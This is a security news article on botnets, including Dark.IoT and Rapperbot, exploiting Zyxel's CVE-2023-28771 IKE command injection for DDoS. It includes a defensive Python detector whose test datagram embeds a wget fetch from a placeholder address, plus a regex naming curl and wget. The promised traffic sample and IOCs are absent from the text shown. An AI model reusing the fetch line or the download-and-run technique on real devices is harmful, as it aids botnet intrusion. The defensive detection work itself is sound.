Thursday, February 22, 2024

Critical Zyxel Firewall Injection Flaw Exploited to Conduct DDoS Attacks

Increased botnet activity targeting a vulnerability (CVE-2023-28771) in Zyxel devices has become a major concern for their users.

This vulnerability lets an unauthorized attacker execute arbitrary code by sending a specially crafted packet to the targeted device.

Since CISA added this vulnerability to its Known Exploited Vulnerabilities catalog, attacks have surged; the severity of the flaw is rated 9.8.

According to FortiGuard researchers, multiple botnets were involved in targeting the vulnerability, including Dark.IoT, a variant based on Mirai, and a botnet that can perform customizable DDoS attacks.

Botnet activity

Analysis of Attack:

The traffic has been observed across multiple regions, such as Central America, North America, and East and South Asia.

Threat actors specifically target the command injection vulnerability in the Internet Key Exchange (IKE) packet transmitted over UDP on Zyxel devices.

Later, they use curl or wget to download scripts tailored to the MIPS architecture for further malicious actions.
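A detection heuristic for the pattern described above, added here as an example (it is not code from FortiGuard or Zyxel): it parses the fixed 28-byte IKE header of a UDP/500 datagram and flags datagrams whose body carries a curl or wget invocation with a URL. The function names, the regex, and the sample datagrams are assumptions constructed for illustration.

```python
import re
import struct

# Fixed ISAKMP/IKE header: initiator SPI, responder SPI, next payload,
# version, exchange type, flags, message ID, total length (28 bytes).
IKE_HEADER = struct.Struct("!8s8sBBBBII")

# Assumption: the downloader tools named in the article, followed by a URL.
DOWNLOADER = re.compile(rb"\b(curl|wget)\b[^\x00]{0,64}?(https?|ftp|tftp)://", re.I)


def inspect_ike_datagram(payload: bytes):
    """Return a finding dict for a UDP/500 payload, or None if nothing is flagged."""
    if len(payload) < IKE_HEADER.size:
        return None  # too short to be IKE
    _, _, _, version, exchange, _, _, length = IKE_HEADER.unpack_from(payload)
    major = version >> 4
    if major not in (1, 2):
        return None  # not IKEv1/IKEv2
    match = DOWNLOADER.search(payload[IKE_HEADER.size:])
    if match is None:
        return None
    return {
        "ike_major": major,
        "exchange_type": exchange,
        "tool": match.group(1).decode().lower(),
        # A declared length that disagrees with the datagram is a second signal.
        "length_mismatch": length != len(payload),
    }


def build_sample(body: bytes) -> bytes:
    """Constructed test datagram: IKEv2 IKE_SA_INIT header plus an opaque body."""
    header = IKE_HEADER.pack(b"\x11" * 8, b"\x00" * 8, 33, 0x20, 34, 0x08, 0,
                             IKE_HEADER.size + len(body))
    return header + body


# Constructed samples (not captured traffic); 192.0.2.10 is a documentation address.
BENIGN = build_sample(bytes(range(1, 41)))
SUSPICIOUS = build_sample(b"\x00" * 8 + b"wget http://192.0.2.10/constructed-sample")

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, inspect_ike_datagram(pkt))
```

A legitimate IKE negotiation has no reason to carry downloader command lines, so a hit is worth alerting on even if the device is already patched.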

The initially downloaded scripts rename themselves and execute with zywall parameters to ensure connectivity for the ZyXEL vulnerability.

Additional scripts associated with the Rapperbot malware were downloaded from a different server, which in turn downloads MIPS script files to establish persistence.

This shows that the threat actors used multiple servers in this campaign to compromise ZyXEL devices.

Threat actors update their tactics and techniques frequently within a short time frame to maximize the number of compromised devices.

As noted earlier, one of the botnets employed by the threat actors is Dark.IoT, which uses an OpenNIC server for DNS resolution and communication with the C2 server.

Devices with known vulnerabilities should be patched and updated as soon as possible to prevent attacks and compromises.

Once the victim system receives the attack command, it starts a DDoS attack on a specific IP address and port number. One example of this DDoS attack traffic is shown below.

IOCs
